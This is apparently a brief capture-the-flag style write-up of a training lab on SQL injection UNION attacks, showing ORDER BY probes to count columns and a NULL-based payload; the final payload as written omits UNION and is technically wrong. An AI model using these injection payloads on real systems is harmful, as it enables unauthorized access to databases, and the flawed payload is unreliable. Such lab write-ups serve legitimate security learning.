INFO LAB :
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
GOAL : → To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.
First we need to know How many columns on this Database of this lab
we have seen this before in previous labs.
' ORDER BY 1-- 200 ok
' ORDER BY 2-- 200 ok
' ORDER BY 3-- 200 ok
' ORDER BY 4-- 500 internal server error
ok Now we Know we have just 3 columns in this DB
let’s try to use NULL To returned by the query
' SELECT NULL,NULL,NULL--
🎉 Congrats! You’ve solved the lab! 🎉